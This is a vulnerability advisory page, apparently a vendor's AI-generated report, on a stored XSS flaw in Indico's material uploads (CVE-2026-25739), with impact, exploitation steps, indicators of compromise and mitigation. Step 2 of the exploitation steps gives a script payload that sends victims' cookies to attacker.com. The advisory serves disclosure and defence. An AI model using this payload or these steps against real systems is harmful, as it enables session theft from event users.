CVE-2026-25739: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-25739 is a stored Cross-Site Scripting (XSS) vulnerability in Indico, an open-source event management system developed by CERN. The flaw exists in the material upload functionality, where certain file types are not properly sanitized, allowing authenticated users to inject malicious scripts. All Indico versions prior to 3.3.10 are affected. The vulnerability was discovered by researcher dreyercito, disclosed on February 17, 2026, and patched in the same release. It carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and more specifically CWE-692 (Incomplete Denylist to Cross-Site Scripting), indicating that Indico relied on a denylist-based approach to filter dangerous file types or content, which was incomplete and could be bypassed (GitHub Advisory, Indico Advisory). An attacker with low-level privileges (e.g., a speaker or registered user) can upload a specially crafted file as event material; when a victim visits or downloads the material, the malicious script executes in their browser context. The scope is marked as "Changed," meaning the injected script can affect resources outside the vulnerable component's security boundary. No public proof-of-concept exploit code has been identified at this time.

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary JavaScript in the browsers of other Indico users who interact with the malicious material, resulting in low confidentiality and integrity impacts (e.g., session token theft, credential harvesting, or unauthorized actions on behalf of the victim). Because the scope changes, the attack can cross security boundaries and affect users beyond the attacker's own session. Availability is not impacted. The risk is elevated in environments where speakers or external contributors are permitted to upload materials, as these roles are typically granted upload access by default (GitHub Advisory).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-25739. The EPSS score is approximately 0.043% (roughly the 19th percentile), indicating a low near-term exploitation probability (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a low-privilege authenticated account and victim user interaction, which limits the attack surface compared to unauthenticated vulnerabilities.

Exploitation steps

  1. Obtain access: Register or log in to a vulnerable Indico instance (version < 3.3.10) with at least speaker or contributor-level privileges, which are commonly granted to event participants.
  2. Craft a malicious file: Prepare a file of a type that bypasses Indico's incomplete denylist (e.g., an HTML file or a file with a misleading extension containing embedded JavaScript such as <script>document.location='https://attacker.com/?c='+document.cookie</script>).
  3. Upload as material: Navigate to an event or contribution where material uploads are permitted and upload the crafted file as event material.
  4. Deliver to victim: Share the event link or material download link with the target user (e.g., an event organizer or administrator).
  5. Script execution: When the victim accesses or downloads the malicious material through the Indico interface without a strict Content Security Policy enforced, the embedded script executes in their browser, potentially stealing session cookies or performing actions on their behalf (GitHub Advisory, Indico Advisory).

Indicators of compromise

  • Network: Unexpected outbound requests from a victim's browser to external domains shortly after accessing Indico material download endpoints; unusual HTTP requests to attacker-controlled infrastructure containing encoded cookie or session data.
  • Logs: Indico access logs showing uploads of unusual file types (e.g., .html, .svg, .xml, or double-extension files) to material endpoints by low-privilege accounts; repeated access to material download URLs by multiple distinct users following a single upload event.
  • File System: Presence of uploaded files with HTML/JavaScript content in Indico's material storage directory that do not correspond to expected document types (PDF, DOCX, etc.).
  • Browser/Application: Reports from users of unexpected redirects or pop-ups when accessing event materials on an Indico instance (GitHub Advisory).

Mitigation and workarounds

The primary remediation is to upgrade Indico to version 3.3.10 or later, which contains the security fix (Indico Release). For nginx deployments using STATIC_FILE_METHOD set to xaccelredirect, administrators must also update the webserver configuration by adding add_header Content-Security-Policy $upstream_http_content_security_policy; to the .xsf/indico/ location block to benefit from the strict CSP for file downloads. As interim workarounds, apply a strict Content Security Policy at the webserver level for material download endpoints, and restrict material upload permissions to only trusted users (GitHub Advisory, Indico Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management